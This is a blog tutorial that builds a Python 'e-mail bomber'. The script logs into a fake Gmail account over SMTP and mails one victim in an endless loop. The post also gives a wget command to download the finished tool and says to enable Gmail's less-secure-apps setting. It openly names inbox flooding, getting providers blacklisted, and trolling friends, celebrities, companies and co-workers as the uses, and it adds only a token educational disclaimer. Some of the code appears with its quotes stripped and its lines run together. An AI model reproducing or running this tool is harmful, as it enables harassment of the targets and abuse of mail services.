Creating E-mail Bomber in 15 Minutes with Python

In this article I will demonstrate the operation of a spammer technique, used for continuous sending of e-mail messages to third parties, in order to fill inboxes, make specific providers blacklist and even can be used by trolling to fool friends, celebrities, companies And co-workers by Trolls and coding a simple example of a tool using only 3 (useful) functions with Python. In it we will be proceeding with a GMAIL Fake account to perform the uploads in flood. The following script, as you will notice, only makes connections directly to the Gmail SMTP service, if you want to adapt it to other providers, simply change the test () function by entering the credentials and even modify the functions to use SSL / TLS and certificates. So as a first step, you will need to create a fake account in Gmail .

This article is intended for educational purposes, in order to inform programmers, students and information security professionals about the subject. We are not responsible for the improper use of the tools.

“The Black side is no longer Powerful, just easier and more seductive”

This method consists of exploring the use of Sendmail . A library of Linux SMTP submissions that can be compiled or installed directly from repositories.

 # apt-get install sendmail sendmail-bin # Debian # yum install sendmail # CentOS/RHEL 7

Let’s import the libraries needed to e-mail the Bomb . Make sure you have them all installed on your system. If you do not have it, just search for them using Pip or Easy_Install. Resolving the dependencies is up to you.

from email.mime.text import MIMEText
from email.MIMEMultipart import MIMEMultipart
import smtplib as s
import sys
view raw impots.py hosted with ❤ by GitHub

Now let’s declare a ‘Main’ function that we will use to get the email and password of the gmail account that we will use to make the bomb. Note that in the middle of your function we are calling the function ‘test ()’, passing with arguments the variables email_user, email_pass that we collect. Let’s create it now.

#FUNÇÃO MAIN DO SISTEMA #Pegamos o e-mail e a senha do e-mail fake que criamos para o ataque def main(): print banner() email_user = raw_input(INFORME SEU E-MAIL (GMAIL): ) email_pass = raw_input(INFORME SUA SENHA: ) validade,conn = test(email_user, email_pass) print [!] CONEXÃO REALIZADA COM SUCESSO! print conn if validade == True: send_emails(email_user,conn) else: print conn_error()

sys.exit
view raw mainbomb.py hosted with ❤ by GitHub

Defining the function ‘Test ()’ with the email_user arguments, email_pass. We will use this function to try SMTP connection with Gmail ‘ smtp.gmail.com ‘ on port 587 with the ‘conn’ object built using the credentials. If this test does occur, it will return the connection variable that we created. We will use this to flood.

#VALIDA O LOGIN E SENHA def test(email_user, email_pass): try: conn = s.SMTP(smtp.gmail.com, 587) conn.starttls() conn.ehlo conn.login(email_user, email_pass) return True,conn except:

print conn_error()
view raw testmail.py hosted with ❤ by GitHub

Now we will create another function that will be responsible for sending emails. This is the coolest one, where we will collect the destination, message and subject data, and together with the libraries imported from MIMEText and MIMEMultipart, we will format those variables in a specific email format and save them in the ‘message’ variable.

#ESSA FUNÇÃO É RESPONSÁVEL PELO ENVIO DOS EMAILS def send_emails(email_user,conn): #Pega o e-mail da vítima FROM = email_user TO = raw_input([!] INFORME O DESTINATÁRIO: ) #Escreve o e-mail SUBJECT = raw_input([!] INFORME O ASSUNTO: ) text = raw_input([!] ESCREVA UMA MENSAGEM: ) #Formata a mensagem nos padrões de envio SMTP message = MIMEMultipart() message[From] = FROM message[To] = TO message[Subject] = SUBJECT message.attach(MIMEText(text, plain, utf-8)) email = message.as_string() #Envia o E-mail em looping while True: try: conn.sendmail(FROM, TO, email) print [*] Floodando seu amigo… Pressione CTRL + C para cancelar except: print [x] Fail…

sys.exit()
view raw senbomnd.py hosted with ❤ by GitHub

In order for the message to exit in the correct Western standards, it is necessary to perform the same encode when we transform the message and headers into email-format

 message.attach(MIMEText(text, 'plain', 'utf-8'))

Downloading the Code

# wget https://raw.githubusercontent.com/msfidelis/MyHackingTools/master/Trolling%20Scripts/Email%20Flood%20Trolling/Email-Flood.py # chmod +x Email-Flood.py

In order for you to be able to perform the procedure, you’ll need to log in with your Google Fake account, go to the security options, and enable the ‘Allow Less Secure Devices’ option.

 https://www.google.com/settings/security/lesssecureapps

E-mail Bombing

With the script we just made / downloaded, we’ll call it with Python and provide the access credentials for our fake account in Gmail.
 # python Email-Flood.py

Inform the Recipient, Subject and Message and go to Flood

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s